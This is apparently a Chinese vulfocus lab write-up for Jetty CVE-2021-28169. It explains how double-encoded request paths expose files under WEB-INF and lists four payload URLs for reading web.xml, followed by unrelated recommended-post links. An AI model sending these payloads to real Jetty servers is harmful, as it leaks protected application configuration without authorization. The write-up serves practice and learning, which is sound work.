vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload:

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问:

对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml

相关推荐
飒飒的宇y8 天前
【Java Nio Netty】基于TCP的简单Netty自定义协议实现(万字,全篇例子)
java·后端·websocket·tcp/ip·jetty
为美好的生活献上中指2 个月前
Java学习Day60:微服务总结!(有经处无火,无火处无经)
java·spring boot·spring cloud·微服务·sentinel·jetty
啥都想学的又啥都不会的研究生2 个月前
java工程启动优化
java·jvm·spring boot·spring·jetty
笨手笨脚の2 个月前
深入拆解Tomcat&Jetty(二)
java·spring·tomcat·jetty·web容器
小春学渗透3 个月前
DAY80服务攻防-中间件安全&HW2023-WPS 分析&Weblogic&Jetty&Jenkins&CVE
网络·安全·中间件·jetty·安全服务
laufing3 个月前
jenkins 安装
jdk·jenkins·jetty
前端筱悦3 个月前
在springboot中如何使用Jetty替换Tomcat
spring boot·后端·jetty
程序猿DD_4 个月前
Spring Boot中Tomcat、Jetty、Undertow哪个嵌入式服务器最好?
服务器·spring boot·后端·tomcat·jetty
健康茶天下4 个月前
网站上线3个多月了,还没有被百度收录怎么办?
spring boot·spring cloud·百度·爬山算法·jetty
MXsoft6184 个月前
jetty(v9.0.7)中间件监控指标深度解读
中间件·jetty